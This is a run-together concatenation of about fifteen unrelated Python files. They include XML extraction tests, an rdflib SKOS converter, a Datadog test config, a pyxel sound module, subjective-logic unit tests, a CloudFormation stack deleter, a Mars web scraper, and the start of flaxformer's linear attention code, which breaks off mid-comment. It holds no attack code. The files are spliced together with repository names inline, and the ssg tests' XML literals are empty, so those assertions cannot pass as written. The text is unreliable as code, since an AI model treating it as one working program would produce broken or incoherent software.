#print 'For dog hyponyms, the number of features with more frequent 1s are:',np.bincount(most_freq_vals_dead)[1] #print 'For nodog hyponyms, the number of features with more frequent 1s are:',np.bincount(most_freq_vals_live)[1] # ##Get indices of features with 1 #dead_indices = np.argwhere(most_freq_vals_dead) #live_indices = np.argwhere(most_freq_vals_live) #print live_indices ##Get the count by layer #dead_layer_counts = {} #live_layer_counts = {} #for d in dead_indices: # for k,v in layers_dict.iteritems(): # if v[0] < d < v[1]: # if k in dead_layer_counts.keys(): # dead_layer_counts[k]+=1 # else: # dead_layer_counts[k]=1 #for l in live_indices: # for k,v in layers_dict.iteritems(): # if v[0] < l < v[1]: # if k in live_layer_counts.keys(): # live_layer_counts[k]+=1 # else: # live_layer_counts[k]=1 #print live_layer_counts #NEXT: sort layers. find subsets for hyponym embedding extraction (vs mammal?). look for relations between features of same synset (weights between layers?) import pytest import os import re import ssg.build_cpe import ssg.xml ET = ssg.xml.ElementTree def test_extract_element(): obj = """ This That """ tree = ET.fromstring(obj) assert ssg.build_cpe.extract_subelement(tree, 'id') == 'test' assert ssg.build_cpe.extract_subelement(tree, 'random') == 'not-me' assert ssg.build_cpe.extract_subelement(tree, 'missing') is None assert ssg.build_cpe.extract_subelement(tree, 'subelement') is None def test_extract_env_obj(): local_var_text = """ elements """ local_var = ET.fromstring(local_var_text) local_var_missing_text = """ here """ local_var_missing = ET.fromstring(local_var_missing_text) objects_text = """ something magical here """ objects = ET.fromstring(objects_text) present = ssg.build_cpe.extract_env_obj(objects, local_var) assert present is not None assert present.text == 'magical' missing = ssg.build_cpe.extract_env_obj(objects, local_var_missing) assert missing is None def test_extract_referred_nodes(): tree_with_refs_text = """ """ tree_with_refs = ET.fromstring(tree_with_refs_text) tree_with_ids_text = """ Brno Boston Source Code Fedora """ tree_with_ids = ET.fromstring(tree_with_ids_text) results = ssg.build_cpe.extract_referred_nodes(tree_with_refs, tree_with_ids, 'object_ref') assert len(results) == 1 assert results[0].text == 'Source Code' #!/usr/bin/env python from rdflib import Graph, Namespace, URIRef, Literal, RDF import csv import sys import re if len(sys.argv) != 4: print >>sys.stderr, "Usage: %s " % sys.argv[0] sys.exit(1) classes_file = sys.argv[1] glossary_file = sys.argv[2] metadata_file = sys.argv[3] DC = Namespace("http://purl.org/dc/elements/1.1/") GFDC = Namespace("http://urn.fi/URN:NBN:fi:au:gfdc:") SKOS = Namespace("http://www.w3.org/2004/02/skos/core#") # map 3-letter ISO 639-2 language codes to 2-letter 639-1 codes used in RDF LANGMAP = { 'eng': 'en', 'fin': 'fi', 'swe': 'sv', 'ger': 'de', 'fre': 'fr', 'slv': 'sl' } g = Graph() g.namespace_manager.bind('dc', DC) g.namespace_manager.bind('skos', SKOS) g.namespace_manager.bind('gfdc', GFDC) def class_uri(notation): return GFDC['C' + notation.replace(' ','')] def concept_uri(conceptid): return GFDC['G%04d' % int(conceptid)] def cleanup_note(note): note = note.strip() if note.startswith('[') or note.startswith('('): note = note[1:] if note.endswith(']') or note.endswith(')'): note = note[:-1] return note.strip() def add_class(notation, labels, includingNotes, scopeNotes, BT, seeAlsos): uri = class_uri(notation) g.add((uri, RDF.type, SKOS.Concept)) g.add((uri, RDF.type, GFDC.Class)) g.add((uri, SKOS.notation, Literal(notation))) for lang3, lang2 in LANGMAP.items(): if labels[lang3] != '' and labels[lang3] != 'MISSING_VALUE': g.add((uri, SKOS.prefLabel, Literal(labels[lang3], lang2))) if includingNotes[lang3] != '': g.add((uri, SKOS.scopeNote, Literal(cleanup_note(includingNotes[lang3]), lang2))) if scopeNotes[lang3] != '': g.add((uri, SKOS.scopeNote, Literal(cleanup_note(scopeNotes[lang3]), lang2))) for seeAlso in seeAlsos: if ' ' in seeAlso: print >>sys.stderr, "Skipping bad seeAlso value '%s'" % seeAlso continue if seeAlso == '': continue other = class_uri(seeAlso) g.add((uri, SKOS.related, other)) g.add((other, SKOS.related, uri)) if BT != '': g.add((uri, SKOS.broader, class_uri(BT))) g.add((class_uri(BT), SKOS.narrower, uri)) else: g.add((uri, SKOS.topConceptOf, GFDC[''])) g.add((GFDC[''], SKOS.hasTopConcept, uri)) g.add((uri, SKOS.inScheme, GFDC[''])) def add_concept(conceptid, clnum, labels, altLabels, hiddenLabels): uri = concept_uri(conceptid) g.add((uri, RDF.type, SKOS.Concept)) g.add((uri, RDF.type, GFDC.GlossaryConcept)) for lang, label in labels.items(): if labels[lang] != '': g.add((uri, SKOS.prefLabel, Literal(labels[lang], lang))) for lang, altlabels in altLabels.items(): for altlabel in altlabels: if altlabel != '': g.add((uri, SKOS.altLabel, Literal(altlabel, lang))) for lang, hiddenlabels in hiddenLabels.items(): for hiddenlabel in hiddenlabels: if hiddenlabel != '': g.add((uri, SKOS.hiddenLabel, Literal(hiddenlabel, lang))) # link to class cluri = class_uri(clnum) g.add((uri, SKOS.relatedMatch, cluri)) g.add((cluri, SKOS.relatedMatch, uri)) g.add((uri, SKOS.inScheme, GFDC['G'])) def add_metadata(field, values): prefix, ln = field.split(':') namespaces = dict(g.namespace_manager.namespaces()) ns = namespaces[prefix] fielduri = URIRef(ns + ln) for lang3, lang2 in LANGMAP.items(): if values[lang3] != '': for val in values[lang3].splitlines(): if val == '': continue g.add((GFDC[''], fielduri, Literal(val, lang2))) with open(classes_file, 'rb') as cf: reader = csv.DictReader(cf) for row in reader: labels = {} includingNotes = {} scopeNotes = {} BT = row['BT'] seeAlsos = row['seeAlso'].split('|') for lang in LANGMAP.keys(): labels[lang] = row['prefLabel-%s' % lang].strip() includingNotes[lang] = row['includingNote-%s' % lang].strip() scopeNotes[lang] = row['scopeNote-%s' % lang].strip() add_class(row['fdcNumber'].strip(), labels, includingNotes, scopeNotes, BT, seeAlsos) with open(glossary_file, 'rb') as gf: reader = csv.DictReader(gf) for row in reader: values = {} altLabels = {} hiddenLabels = {} for lang in LANGMAP.values(): values[lang] = row['indexTerm-%s' % lang].strip() altLabels[lang] = row['altLabel-%s' % lang].strip().split('|') hiddenLabels[lang] = row['hiddenLabel-%s' % lang].strip().split('|') add_concept(row['conceptId'].strip(), row['fdcNumber'].strip(), values, altLabels, hiddenLabels) with open(metadata_file, 'rb') as mf: reader = csv.DictReader(mf) for row in reader: values = {} for lang in LANGMAP.keys(): values[lang] = row['Value-%s' % lang].strip() add_metadata(row['Field'].strip(), values) # enrich scope notes with hyperlinks def concept_link(match): code = match.group(0) uri = class_uri(code) if (uri, RDF.type, SKOS.Concept) in g: # concept exists - make it a hyperlink return '
    %s' % (uri, code) else: # no such concept, use just a plain code return code for conc,note in g.subject_objects(SKOS.scopeNote): newnote = re.sub('\d+(\.\d+)*(/\.\d+)?', concept_link, note) if newnote != unicode(note): g.remove((conc, SKOS.scopeNote, note)) g.add((conc, SKOS.scopeNote, Literal(newnote, note.language))) g.serialize(destination=sys.stdout, format='turtle') glasser/integrations-coreaerospike/tests/common.py # (C) Datadog, Inc. 2019 # All rights reserved # Licensed under a 3-clause BSD style license (see LICENSE) import os from datadog_checks.dev import get_docker_hostname HERE = os.path.dirname(os.path.abspath(__file__)) COMPOSE_FILE = os.path.join(HERE, 'docker', 'docker-compose.yaml') HOST = get_docker_hostname() PORT = 3000 INSTANCE = { 'host': HOST, 'port': PORT, 'metrics': ['cluster_size', 'batch_error'], 'namespace_metrics': [ 'objects', 'hwm_breached', 'client_write_error', 'client_write_success', 'objects', 'tombstones', 'stop_writes_count', 'truncate_lut', 'memory_data_bytes', ], 'namespaces': ['test'], 'tags': ['tag:value'], } import numpy as np from ._CFunctions import _CInternalField,_CInternalFieldDeg def Field(p0,p1,p2,MaxDeg=None): ''' Return the internal magnetic field vector(s). Check the model config using JupiterMag.Internal.Config() to see whether Cartesian or polar coordinates are used for input/output and to set the model. Inputs ====== p0 : float Array/scalar containing x or r right-handed System III coordinate p1 : float Array/scalar containing y or theta right-handed System III coordinate p2 : float Array/scalar containing z or phi right-handed System III coordinate MaxDeg : None|int Maximum model degree to use. If None then the default value (model dependant) will be used. Returns ======= B0 : float Either Bx or Br in nT B1 : float Either By or Btheta in nT B2 : float Either Bz or Bphi in nT ''' #make sure that the inputs are the correct type if (hasattr(p0,'__iter__') == False): _p0 = np.array([p0]).astype('float64') else: _p0 = np.array(p0).astype('float64') if (hasattr(p1,'__iter__') == False): _p1 = np.array([p1]).astype('float64') else: _p1 = np.array(p1).astype('float64') if (hasattr(p2,'__iter__') == False): _p2 = np.array([p2]).astype('float64') else: _p2 = np.array(p2).astype('float64') _l = np.int32(np.size(_p0)) _B0 = np.zeros(_l,dtype='float64') _B1 = np.zeros(_l,dtype='float64') _B2 = np.zeros(_l,dtype='float64') #call the model if MaxDeg is None: _CInternalField(_l,_p0,_p1,_p2,_B0,_B1,_B2) else: _MaxDeg = np.int32(MaxDeg) _CInternalFieldDeg(_l,_p0,_p1,_p2,_MaxDeg,_B0,_B1,_B2) return _B0,_B1,_B2 neopenx/Dragon # -------------------------------------------------------- # Dragon # Copyright(c) 2017 SeetaTech # Written by # -------------------------------------------------------- # config from dragon.config import * import dragon.config as config # core from dragon.core.tensor import Tensor import dragon.core.workspace as workspace # ops from dragon.ops import * # updaters from dragon.updaters import * # theano utilities from dragon.vm.theano.compile.function import function as function from dragon.vm.theano.tensor import grad as grad # scope from dragon.core.scope import TensorScope as name_scope from dragon.core.scope import PhaseScope as phase_scope from dragon.core.scope import DeviceScope as device_scope TatchNicolas/pongpongpy/sounds.py from enum import Enum import pyxel # FIXME: このへんの構造よくわかってない # ch: 独立して音楽再生できる空間? # sound: 音を登録しておく場所? class SoundChannel(Enum): SE = 0 BGM = 1 class Sound(Enum): LEFT_POINT = 1 RIGHT_POINT = 2 BGM_1 = 30 BGM_2 = 31 BGM_3 = 32 class Music(Enum): MAIN_BGM = 0 def init_sounds(): """ Soundの初期登録をする """ # 左側チームの得点音 pyxel.sound(Sound.LEFT_POINT.value).set( note="c3e3g3c4c4", tone="s", volume="4", effect=("n" * 4 + "f"), speed=5 ) # 右側チームの得点音 pyxel.sound(Sound.RIGHT_POINT.value).set( note="f3b2f2b1", tone="p", volume="4", effect=("n" * 7 + "f"), speed=5, ) # BGM # とりあえずサンプルを拝借 melody = ( "rrrr e3e3e3e3 d3d3c3c3 b2b2c3c3" + "a2a2a2a2 c3c3c3c3 d3d3d3d3 e3e3e3e3" + "rrrr e3e3e3e3 d3d3c3c3 b2b2c3c3" + "a2a2a2a2 g2g2g2g2 c3c3c3c3 g2g2a2a2" + "rrrr e3e3e3e3 d3d3c3c3 b2b2c3c3" + "a2a2a2a2 c3c3c3c3 d3d3d3d3 e3e3e3e3" + "f3f3f3a3 a3a3a3a3 g3g3g3b3 b3b3b3b3" + "b3b3b3b4 rrrr e3d3c3g3 a2g2e2d2" ) harmony1 = ( "a1 a1 a1 b1 f1 f1 c2 c2" "c2 c2 c2 c2 g1 g1 b1 b1" * 3 + "f1 f1 f1 f1 f1 f1 f1 f1 g1 g1 g1 g1 g1 g1 g1 g1" ) harmony2 = ( ("f1" * 8 + "g1" * 8 + "a1" * 8 + ("c2" * 7 + "d2")) * 3 + "f1" * 16 + "g1" * 16 ) pyxel.sound(Sound.BGM_2.value).set( note=harmony1 * 2 + harmony2 * 2, tone="t", volume="5", effect="f", speed=20 ) pyxel.sound(Sound.BGM_3.value).set( note=("f0 r a4 r f0 f0 a4 r" "f0 r a4 r f0 f0 a4 f0"), tone="n", volume="6622 6622 6622 6426", effect="f", speed=20, ) pyxel.sound(Sound.BGM_1.value).set( note=melody, tone="s", volume=("3"), effect=("nnnsffff"), speed=20, ) ch0 = [] ch1 = [Sound.BGM_1.value, ] ch2 = [Sound.BGM_2.value, ] ch3 = [Sound.BGM_3.value, ] pyxel.music(Music.MAIN_BGM.value).set(ch0, ch1, ch2, ch3) def play_se(se: Sound): pyxel.play(SoundChannel.SE.value, se.value) def play_bgm(): pyxel.playm(Music.MAIN_BGM.value, loop=True) _base_ = [ '../_base_/models/deeplabv3plus_r50-d8-cospcl.py', '../_base_/datasets/pascal_voc12_aug.py', '../_base_/default_runtime.py', '../_base_/schedules/schedule_40k.py' ] model = dict( decode_head=dict(num_classes=21, loss_decode=dict(type='KLPatchContrastiveLoss', use_sigmoid=False, loss_weight=0.25, cal_function='COS07', cal_gate=99)), auxiliary_head=dict(num_classes=21),) optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0005) sundaycat/Leetcode-Practice def find_word_concatenation(str, words): if len(words) == 0 or len(words[0]) == 0: return [] rs, word_freq = [], {} for word in words: if word not in word_freq: word_freq[word] = 0 word_freq[word] += 1 num_of_words, word_len = len(words), len(words[0]) for i in range(len(str) - word_len * num_of_words + 1): word_seen, j = {}, 0 while j < num_of_words: start, end = i + j * word_len, i + (j + 1) * word_len word = str[start : end] # break if we dont need this word if word not in word_freq: break if word not in word_seen: word_seen[word] = 0 word_seen[word] += 1 # no need to proceed further if the word has higher frequency than required if word_seen[word] > word_freq[word]: break if j == num_of_words - 1: rs.append(i) j +=1 return rs """ an unittest package Copyright (c) 2013 <> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import unittest import mpmath import subjective_logic.operators as operators from subjective_logic.Opinion import Opinion class OperatorsTestCase(unittest.TestCase): def setUp(self): self.third = Opinion("1/3", "1/3", "1/3", "1/2") self.nobelief = Opinion("0","1/2","1/2","1/2") self.belief = Opinion("1", "0", "0", "1/2") self.disbelief = Opinion("0", "1", "0", "1/2") self.uncertainty = Opinion("0", "0", "1", "1/2") while True: r1 = mpmath.rand() r2 = mpmath.rand() if r1 + r2 < 1: self.random = Opinion(r1, r2, mpmath.mpf("1") - (r1 + r2), "1/2") break def test_operator_merge_discount1(self): self.assertEqual(operators.graphical_discount_merge([[self.belief, self.belief],[self.belief, self.uncertainty],[self.belief, self.disbelief]]), self.third, self.third.__repr__() + " is not what we got: " + operators.graphical_discount_merge([[self.belief, self.belief],[self.belief, self.uncertainty],[self.belief, self.disbelief]]).__repr__()) #def tearDown(self): # self.foo.dispose() # self.foo = None def test_operators_discount_raise(self): self.assertRaisesRegexp(Exception, "Two valid Opinions are required!", operators.discount, 3, 2) def test_operators_discount1(self): a = Opinion("0", "1", "0", "1/2") b = Opinion("1", "0", "0", "1/2") c = Opinion("0", "0", "1", "1/2") self.assertEqual(operators.discount(a, b), c, "<0,1,0,0.5> \\ctimes <1,0,0,0.5> = "+repr(operators.discount(a, b))+" != <0,0,1,0.5> ") def test_operators_gcombination_raise(self): self.assertRaisesRegexp(Exception, "Two valid Opinions are required!", operators.discount, 3, 2) def test_operators_gcombination_req1(self): t = self.third c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_req2(self): t = self.third c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_req3(self): t = self.third c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_nobelief_req1(self): t = self.nobelief c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_nobelief_req2(self): t = self.nobelief c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_nobelief_req3(self): t = self.nobelief c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_rand_req1(self): t = self.random c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_rand_req2(self): t = self.random c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_rand_req3(self): t = self.random c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_belief_req1(self): t = self.belief c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_belief_req2(self): t = self.belief c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_belief_req3(self): t = self.belief c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_disbelief_req1(self): t = self.disbelief c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_disbelief_req2(self): t = self.disbelief c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_disbelief_req3(self): t = self.disbelief c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_uncertainty_req1(self): t = self.uncertainty c = self.belief r = t self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_uncertainty_req2(self): t = self.uncertainty c = self.disbelief r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) def test_operators_gcombination_uncertainty_req3(self): t = self.uncertainty c = self.uncertainty r = c self.assertEqual(operators.graphical_combination(t, c), r, repr(t) + " \\ cdot " + repr(c) +" = "+ repr(operators.graphical_combination(t, c)) +" != "+ repr(r)) if __name__ == '__main__': unittest.main() """Test page collection.""" from textwrap import dedent import pytest import yaml from mccole.accounting import Config, Info from mccole.collect import collect_pages from mccole.util import McColeExc def test_collect_chapters_key_missing(): assert collect_pages(Config()) == [] def test_collect_single_chapter(): config = Config(src="src", dst="dst", chapters=[{"slug": "first", "title": "First"}]) collect_pages(config) assert config.pages == [ Info( slug="first", title="First", to_root="..", src="src/first/index.md", dst="dst/first/index.html", major=1, template=None, tokens=None, ) ] def test_collect_chapters_and_appendices(): config = Config(src="src", dst="dst", chapters=[ {"slug": "first", "title": "First"}, {"slug": "second", "title": "Second"}, {"slug": "third", "title": "Third", "appendix": True}, {"slug": "fourth", "title": "Fourth"}, ]) collect_pages(config) assert [e.slug for e in config.pages] == [ "first", "second", "third", "fourth", ] assert [e.major for e in config.pages] == [1, 2, "A", "B"] def test_collect_with_root(): config = Config(src="src", dst="dst", root="test.md", chapters=[ {"slug": "first", "title": "First"} ]) collect_pages(config) assert len(config.pages) == 2 index_entry = Info( slug="_index", to_root=".", src="src/test.md", dst="dst/index.html", major=None, template="index.html", tokens=None, ) assert index_entry in config.pages chapter_entry = Info( slug="first", title="First", to_root="..", src="src/first/index.md", dst="dst/first/index.html", major=1, template=None, tokens=None, ) assert chapter_entry in config.pages def test_collect_missing_slug(): config = Config(src="src", dst="dst", chapters=[ {"slug": "first", "title": "First"}, {"key": "value"} ]) with pytest.raises(McColeExc): collect_pages(config) def test_collect_explicit_source_file(): config = Config(src="src", dst="dst", chapters=[ {"slug": "first", "title": "First", "file": "something.md"} ]) collect_pages(config) assert config.pages == [ Info( slug="first", title="First", to_root="..", src="src/something.md", dst="dst/first/index.html", major=1, template=None, tokens=None, ) ] import botocore import click def delete_stacks(**kwargs): """Deletes all stacks with the specified job-identifier""" session = kwargs['session'] job_identifier = kwargs['job_identifier'] cfn_client = session.client('cloudformation') stack_names = sorted([stack['StackName'] for stack in cfn_client.describe_stacks()[ 'Stacks'] if "{}-".format(job_identifier) in stack['StackName']]) choice = click.confirm( "Do you want to delete these stacks? : {}".format(stack_names)) if choice: for stack_name in reversed(stack_names): cfn_client.delete_stack(StackName=stack_name) try: cfn_client.get_waiter('stack_delete_complete').wait( StackName=stack_name) click.echo("Deleted {}.".format(stack_name)) except botocore.exceptions.WaiterError as waiter_error: click.echo("{} failed to delete. {}".format( stack_name, waiter_error)) click.echo("Stopped stack deletion.") break import pandas as pd import os from bs4 import BeautifulSoup as bs from urllib.request import urlopen from splinter import Browser from selenium import webdriver from webdriver_manager.chrome import ChromeDriverManager def init(): executable_path = {'executable_path': ChromeDriverManager().install()} chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--disable-dev-shm-usage") chrome_options.add_argument("--no-sandbox") browser = Browser('chrome', **executable_path, headless=True) return browser def scrape_nasa(): nasa_news_site_url = 'https://mars.nasa.gov/news/' html = urlopen(nasa_news_site_url) nasa_news_data = bs(html, 'lxml') nasa_news = { 'title': nasa_news_data.find_all("div", {"class": "content_title"})[0].text.strip('\n'), 'paragraph': nasa_news_data.find_all("div", {"class": "rollover_description_inner"})[0].text.strip('\n') } return nasa_news def scrape_featured_image(): browser=init() featured_image_site_url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html' browser.visit(featured_image_site_url) html = browser.html featured_image_data = bs(html, 'html.parser') imgLinkString=featured_image_data.find_all("a",{"class": "showimg fancybox-thumbs"}) browser.quit() featured_image_url="https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/"+imgLinkString[0]['href'] return featured_image_url def scrape_mars_facts(): mars_facts_site_url = 'https://space-facts.com/mars/' mars_facts = pd.DataFrame(pd.read_html(mars_facts_site_url)[0]) html_table = mars_facts.to_html() return html_table def scrape_hemispheres(): image_urls=[] browser=init() hemisphere_images_site_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' for i in range(0,4): browser.visit(hemisphere_images_site_url) browser.find_by_css("a.product-item h3")[i].click() html = browser.html hemisphere_data = bs(html, "html.parser") title = hemisphere_data.find('h2').text image_url = hemisphere_data.find_all('a','target'=='_blank')[4]["href"] image_url = { "title": title, "img_url": image_url} image_urls.append(image_url) browser.quit() return image_urls def testing(): test_mars_facts_site_url = 'https://space-facts.com/mars/' test_mars_facts = pd.read_html(test_mars_facts_site_url)[0] fact_list = [] count = 0 for i in test_mars_facts[0]: fact_list.append([i,test_mars_facts[1][count]]) count +=1 return(fact_list) def scrape_all(): scraped_data = { 'nasa_news': scrape_nasa(), 'featured_image': scrape_featured_image(), 'mars_facts': testing(), 'hemispheres': scrape_hemispheres(), 'if_blank': '' } return scraped_data blank_data = { 'nasa_news': {'title':'No Value', 'title':'No Value'}, 'featured_image': 'broken_img.jpeg', 'mars_facts': [['No', 'Value']], 'hemispheres': [{'title': 'No Value','img_url': 'broken_img.jpeg'},{'title': 'No Value','img_url': 'broken_img.jpeg'},{'title': 'No Value','img_url': 'broken_img.jpeg'},{'title': 'No Value','img_url': 'broken_img.jpeg'}], 'if_blank': "Oh no, you don't have any data! Try scraping some below!" }tomweingarten/flaxformerflaxformer/components/attention/linear_attention.py # Copyright 2022 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Linear attention classes.""" # pylint: disable=attribute-defined-outside-init,g-bare-generic import abc import functools from typing import Callable, Optional, Tuple, Union import flax from flax import linen as nn import flax.core.variables as variables from flax.linen import initializers from flax.linen.linear import default_kernel_init import jax from jax import lax import jax.numpy as jnp from flaxformer import activation_partitioning from flaxformer.components import dense from flaxformer.components import embedding from flaxformer.types import Array from flaxformer.types import DType from flaxformer.types import Initializer class LinearAttention(metaclass=abc.ABCMeta): """API for attention classes that compute a linear approximation of the attention matrix. This allows for 1D vectors masking the key/value part of the attention """ @abc.abstractmethod def __call__(self, inputs_q: Array, inputs_kv: Array, mask: Optional[Array] = None, *, precomputed_qkv: Optional[Array] = None, decode: bool = False, enable_dropout: bool = True) -> Array: """Applies attention on the input data. Args: inputs_q: input queries of shape `[batch_sizes..., q_length, q_features]`. inputs_kv: key/values of shape `[batch_sizes..., kv_length, kv_features]`. mask: attention mask of shape `[batch_sizes..., num_heads, kv_length]`. precomputed_qkv: when using fused implementations QKVO are defined outside this module and we only use the module to run computations. decode: Whether to prepare and use an autoregressive cache. enable_dropout: Enables dropout if set to True. Returns: output of shape `[batch_sizes..., length, features]`. """ class MultiHeadLinearAttention(nn.Module, LinearAttention): """Multi-head linear attention. Attributes: num_heads: number of attention heads. Features (i.e. inputs_q.shape[-1]) should be divisible by the number of heads. use_bias: bool: whether pointwise QKVO dense transforms use bias. dtype: the dtype of the computation (default: float32) qkv_features: dimension of the key, query, and value. head_dim: dimension of each head. If unspecified, it defaults to qkv_features // num_heads. out_features: dimension of the last projection broadcast_dropout: bool: use a broadcasted dropout along batch dims. dropout_rate: dropout rate precision: numerical precision of the computation see `jax.lax.Precision` for details. kernel_init: initializer for the kernel of the Dense layers. bias_init: initializer for the bias of the Dense layers. attention_fn: dot_product_attention or compatible function. Accepts query, key, value, and returns output of shape `[bs, dim1, dim2, ..., dimN,, num_heads, value_channels]`` use_extra_logit: whether to include a virtual extra logit equal to zero. float32_logits: bool, if True then compute logits in float32 to avoid numerical issues with bfloat16. output_projection: Project the output of `attention_fn` to `out_features`. If False, returns the output of `attention_fn` without a projection. split_head_kernel: whether to store QKVO variables with a split head dimension. kernels_to_fuse: Which kernels to fuse, if any. use_rotary_embedding: whether to use rotary embeddings. """ num_heads: int use_bias: bool dtype: DType = jnp.float32 qkv_features: Optional[int] = None head_dim: Optional[int] = None out_features: Optional[int] = None broadcast_dropout: bool = True dropout_rate: float = 0. precision: Optional[lax.Precision] = None kernel_init: Initializer = default_kernel_init bias_init: Initializer = initializers.zeros rescale_logits: bool = False attention_fn: Callable[..., Array] = None use_extra_logit: bool = False float32_logits: bool = False output_projection: bool = True # TODO: Remove out_features and output_projection. split_head_kernel: bool = False kernels_to_fuse: Optional[str] = None use_rotary_embedding: bool = False rotary_embedding_max_timescale: float = 1e4 # Whether to shard over the head dimension, setting this to False when the # number of heads is not divisible your activation num_partitions sharding_over_head_dimension: bool = True def update_cache_prefill( self, key: Array, value: Array, cached_key: variables.Variable, cached_value: variables.Variable, cache_index: variables.Variable, prefill_lengths: Array ) -> Tuple[Array, Array, Array, Array, Array, Array]: """Update the autoregressive cache for multiple timesteps at once. This is useful for things like a prefix-lm where the encoder section of the input is visible bidirectionally. The key and value for this section need to be computed in a single shot, as a step by step approach would result in causal attention. Args: key: The calculated key used in attention. [batch..., length, num_heads, features_per_head] value: The calculated value used in attention. [batch..., length, num_heads, features_per_head] cached_key: The cache of previous keys. [batch..., num_heads, features_per_head, length] cached_value: The cache of previous values. [batch..., num_heads, features_per_head, length] cache_index: The timestep that we are currently calculating the key and value for. [batch] prefill_lengths: The number of timesteps we should fill in the cache. [batch] Returns: The key, value, and the last timestep we just filled in the cache. We also return the new cache values for now because assigning to a variable inside of a method doesn't work. These returns will be removed eventually. """ # Make a reference to the data underlaying the variable for ease of # use. cache_index.value = prefill_lengths # Note, the cache index is now a vector # of batch size so that each example can start just after it's # prefix which can be different lengths for different examples. cur_index = cache_index.value # Move the sequence dimension to the end to match the cache shapes. key_cached = jnp.moveaxis(key, -3, -1) value_cached = jnp.moveaxis(value, -3, -1) # Reshape the index so the batch is at the beginning, default # broadcasting behavior is to add singleton dims to the front but # we need them at the end. batch_first_index = jnp.reshape( cur_index, (-1,) + tuple(1 for _ in range(cached_key.value.ndim - 1))) # Calculate a mask that will set any position past the prefix to zero # when applied to the key. key_mask = ( lax.broadcasted_iota(jnp.int32, cached_key.value.shape, cached_key.value.ndim - 1) < batch_first_index) value_mask = ( lax.broadcasted_iota(jnp.int32, cached_value.value.shape, cached_value.value.ndim - 1) < batch_first_index) # Set the caches with the calculated key and values but hide anything # past the 